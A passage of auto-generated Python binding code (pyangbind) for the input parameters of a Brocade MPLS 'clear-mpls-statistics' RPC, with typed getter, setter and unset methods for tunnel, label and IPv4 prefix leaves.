raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
    # YANG schema path for this node: delegate to the parent when attached to a
    # data tree, otherwise return the absolute path of this RPC input container.
    if hasattr(self, "_parent"):
        return self._parent._path()+[self._yang_name]
    else:
        return [u'brocade_mpls_rpc', u'clear-mpls-statistics', u'input']
def _rest_path(self):
    # REST URI path for this node. Nodes without a rest_name contribute no
    # segment of their own and simply pass through the parent's path.
    if hasattr(self, "_parent"):
        if self._rest_name:
            return self._parent._rest_path()+[self._rest_name]
        else:
            return self._parent._rest_path()
    else:
        return [u'clear-mpls-statistics', u'input']
def _get_mpls_clear_statistics_type(self):
    """
    Getter method for mpls_clear_statistics_type, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_type (uint32)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_type
def _set_mpls_clear_statistics_type(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_type, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_type (uint32)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_type is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_type() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into the generated uint32 leaf wrapper; raises on range/type violation.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-type", rest_name="mpls-clear-statistics-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_type must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-type", rest_name="mpls-clear-statistics-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
        })
    self.__mpls_clear_statistics_type = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_type(self):
    """Reset mpls_clear_statistics_type to a fresh, unconfigured uint32 leaf."""
    self.__mpls_clear_statistics_type = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-type", rest_name="mpls-clear-statistics-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_clear_statistics_transit_ldp_fec_prefix(self):
    """
    Getter method for mpls_clear_statistics_transit_ldp_fec_prefix, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_fec_prefix (mpls-ipv4-prefix)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_transit_ldp_fec_prefix
def _set_mpls_clear_statistics_transit_ldp_fec_prefix(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_transit_ldp_fec_prefix, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_fec_prefix (mpls-ipv4-prefix)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_transit_ldp_fec_prefix is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_transit_ldp_fec_prefix() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into the dotted-quad/prefix-length string leaf; the regex enforces the format.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])/(([0-9])|([1-2][0-9])|(3[0-2]))'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-fec-prefix", rest_name="mpls-clear-statistics-transit-ldp-fec-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-prefix', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_transit_ldp_fec_prefix must be of a type compatible with mpls-ipv4-prefix""",
            'defined-type': "brocade-mpls:mpls-ipv4-prefix",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])/(([0-9])|([1-2][0-9])|(3[0-2]))'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-fec-prefix", rest_name="mpls-clear-statistics-transit-ldp-fec-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-prefix', is_config=True)""",
        })
    self.__mpls_clear_statistics_transit_ldp_fec_prefix = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_transit_ldp_fec_prefix(self):
    """Reset mpls_clear_statistics_transit_ldp_fec_prefix to a fresh, unconfigured mpls-ipv4-prefix leaf."""
    self.__mpls_clear_statistics_transit_ldp_fec_prefix = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])/(([0-9])|([1-2][0-9])|(3[0-2]))'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-fec-prefix", rest_name="mpls-clear-statistics-transit-ldp-fec-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-prefix', is_config=True)
def _get_mpls_clear_statistics_transit_ldp_prefix_address(self):
    """
    Getter method for mpls_clear_statistics_transit_ldp_prefix_address, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_prefix_address (mpls-ipv4-address)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_transit_ldp_prefix_address
def _set_mpls_clear_statistics_transit_ldp_prefix_address(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_transit_ldp_prefix_address, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_prefix_address (mpls-ipv4-address)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_transit_ldp_prefix_address is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_transit_ldp_prefix_address() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into the dotted-quad IPv4 address leaf; the regex enforces the format.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-address", rest_name="mpls-clear-statistics-transit-ldp-prefix-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_transit_ldp_prefix_address must be of a type compatible with mpls-ipv4-address""",
            'defined-type': "brocade-mpls:mpls-ipv4-address",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-address", rest_name="mpls-clear-statistics-transit-ldp-prefix-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)""",
        })
    self.__mpls_clear_statistics_transit_ldp_prefix_address = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_transit_ldp_prefix_address(self):
    """Reset mpls_clear_statistics_transit_ldp_prefix_address to a fresh, unconfigured mpls-ipv4-address leaf."""
    self.__mpls_clear_statistics_transit_ldp_prefix_address = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-address", rest_name="mpls-clear-statistics-transit-ldp-prefix-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
def _get_mpls_clear_statistics_transit_ldp_prefix_mask(self):
    """
    Getter method for mpls_clear_statistics_transit_ldp_prefix_mask, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_prefix_mask (mpls-ipv4-subnet-mask)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_transit_ldp_prefix_mask
def _set_mpls_clear_statistics_transit_ldp_prefix_mask(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_transit_ldp_prefix_mask, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_ldp_prefix_mask (mpls-ipv4-subnet-mask)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_transit_ldp_prefix_mask is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_transit_ldp_prefix_mask() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into the dotted-quad subnet-mask leaf; the regex enforces the format.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-mask", rest_name="mpls-clear-statistics-transit-ldp-prefix-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-subnet-mask', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_transit_ldp_prefix_mask must be of a type compatible with mpls-ipv4-subnet-mask""",
            'defined-type': "brocade-mpls:mpls-ipv4-subnet-mask",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-mask", rest_name="mpls-clear-statistics-transit-ldp-prefix-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-subnet-mask', is_config=True)""",
        })
    self.__mpls_clear_statistics_transit_ldp_prefix_mask = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_transit_ldp_prefix_mask(self):
    """Reset mpls_clear_statistics_transit_ldp_prefix_mask to a fresh, unconfigured mpls-ipv4-subnet-mask leaf."""
    self.__mpls_clear_statistics_transit_ldp_prefix_mask = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-mask", rest_name="mpls-clear-statistics-transit-ldp-prefix-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-subnet-mask', is_config=True)
def _get_mpls_clear_statistics_transit_label_id(self):
    """
    Getter method for mpls_clear_statistics_transit_label_id, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_label_id (uint32)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_transit_label_id
def _set_mpls_clear_statistics_transit_label_id(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_transit_label_id, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_transit_label_id (uint32)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_transit_label_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_transit_label_id() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into the generated uint32 leaf wrapper; raises on range/type violation.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-transit-label-id", rest_name="mpls-clear-statistics-transit-label-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_transit_label_id must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-transit-label-id", rest_name="mpls-clear-statistics-transit-label-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
        })
    self.__mpls_clear_statistics_transit_label_id = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_transit_label_id(self):
    """Reset mpls_clear_statistics_transit_label_id to a fresh, unconfigured uint32 leaf."""
    self.__mpls_clear_statistics_transit_label_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-transit-label-id", rest_name="mpls-clear-statistics-transit-label-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_clear_statistics_tunnel_ldp_id(self):
    """
    Getter method for mpls_clear_statistics_tunnel_ldp_id, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_ldp_id (uint32)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_tunnel_ldp_id
def _set_mpls_clear_statistics_tunnel_ldp_id(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_tunnel_ldp_id, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_ldp_id (uint32)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_tunnel_ldp_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_tunnel_ldp_id() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into the generated uint32 leaf wrapper; raises on range/type violation.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-ldp-id", rest_name="mpls-clear-statistics-tunnel-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_tunnel_ldp_id must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-ldp-id", rest_name="mpls-clear-statistics-tunnel-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
        })
    self.__mpls_clear_statistics_tunnel_ldp_id = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_tunnel_ldp_id(self):
    """Reset mpls_clear_statistics_tunnel_ldp_id to a fresh, unconfigured uint32 leaf."""
    self.__mpls_clear_statistics_tunnel_ldp_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-ldp-id", rest_name="mpls-clear-statistics-tunnel-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_clear_statistics_tunnel_rsvp_bypass(self):
    """
    Getter method for mpls_clear_statistics_tunnel_rsvp_bypass, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_rsvp_bypass (uint8)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_tunnel_rsvp_bypass
def _set_mpls_clear_statistics_tunnel_rsvp_bypass(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_tunnel_rsvp_bypass, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_rsvp_bypass (uint8)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_tunnel_rsvp_bypass is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_tunnel_rsvp_bypass() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into the generated uint8 (0..255) leaf wrapper; raises on range/type violation.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-rsvp-bypass", rest_name="mpls-clear-statistics-tunnel-rsvp-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_tunnel_rsvp_bypass must be of a type compatible with uint8""",
            'defined-type': "uint8",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-rsvp-bypass", rest_name="mpls-clear-statistics-tunnel-rsvp-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
        })
    self.__mpls_clear_statistics_tunnel_rsvp_bypass = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_tunnel_rsvp_bypass(self):
    """Reset mpls_clear_statistics_tunnel_rsvp_bypass to a fresh, unconfigured uint8 leaf."""
    self.__mpls_clear_statistics_tunnel_rsvp_bypass = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-rsvp-bypass", rest_name="mpls-clear-statistics-tunnel-rsvp-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_mpls_clear_statistics_tunnel_name(self):
    """
    Getter method for mpls_clear_statistics_tunnel_name, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_name (string)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_tunnel_name
def _set_mpls_clear_statistics_tunnel_name(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_tunnel_name, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_name (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_tunnel_name is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_tunnel_name() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into an unrestricted unicode string leaf wrapper.
        t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-clear-statistics-tunnel-name", rest_name="mpls-clear-statistics-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_tunnel_name must be of a type compatible with string""",
            'defined-type': "string",
            'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-clear-statistics-tunnel-name", rest_name="mpls-clear-statistics-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
        })
    self.__mpls_clear_statistics_tunnel_name = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_tunnel_name(self):
    """Reset mpls_clear_statistics_tunnel_name to a fresh, unconfigured string leaf."""
    self.__mpls_clear_statistics_tunnel_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-clear-statistics-tunnel-name", rest_name="mpls-clear-statistics-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_clear_statistics_tunnel_dest(self):
    """
    Getter method for mpls_clear_statistics_tunnel_dest, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_dest (mpls-ipv4-address)
    YANG Description: Tunnel ID to be cleared
    """
    # Return the YANGDynClass-wrapped leaf value (name-mangled private attribute).
    return self.__mpls_clear_statistics_tunnel_dest
def _set_mpls_clear_statistics_tunnel_dest(self, v, load=False):
    """
    Setter method for mpls_clear_statistics_tunnel_dest, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_statistics/input/mpls_clear_statistics_tunnel_dest (mpls-ipv4-address)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mpls_clear_statistics_tunnel_dest is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mpls_clear_statistics_tunnel_dest() directly.
    YANG Description: Tunnel ID to be cleared
    """
    # Unwrap union-typed values to their underlying type before coercion.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Coerce v into the dotted-quad IPv4 address leaf; the regex enforces the format.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-dest", rest_name="mpls-clear-statistics-tunnel-dest", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
    except (TypeError, ValueError):
        # Re-raise with a structured error payload describing the expected type.
        raise ValueError({
            'error-string': """mpls_clear_statistics_tunnel_dest must be of a type compatible with mpls-ipv4-address""",
            'defined-type': "brocade-mpls:mpls-ipv4-address",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-dest", rest_name="mpls-clear-statistics-tunnel-dest", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)""",
        })
    self.__mpls_clear_statistics_tunnel_dest = t
    # Invoke the registered change hook, if the instance provides one.
    if hasattr(self, '_set'):
        self._set()
def _unset_mpls_clear_statistics_tunnel_dest(self):
    """Reset mpls_clear_statistics_tunnel_dest to a fresh, unconfigured mpls-ipv4-address leaf."""
    self.__mpls_clear_statistics_tunnel_dest = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-dest", rest_name="mpls-clear-statistics-tunnel-dest", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
# Public read/write properties exposing each YANG leaf through its generated
# private getter/setter pair (Python 2 __builtin__.property is used because
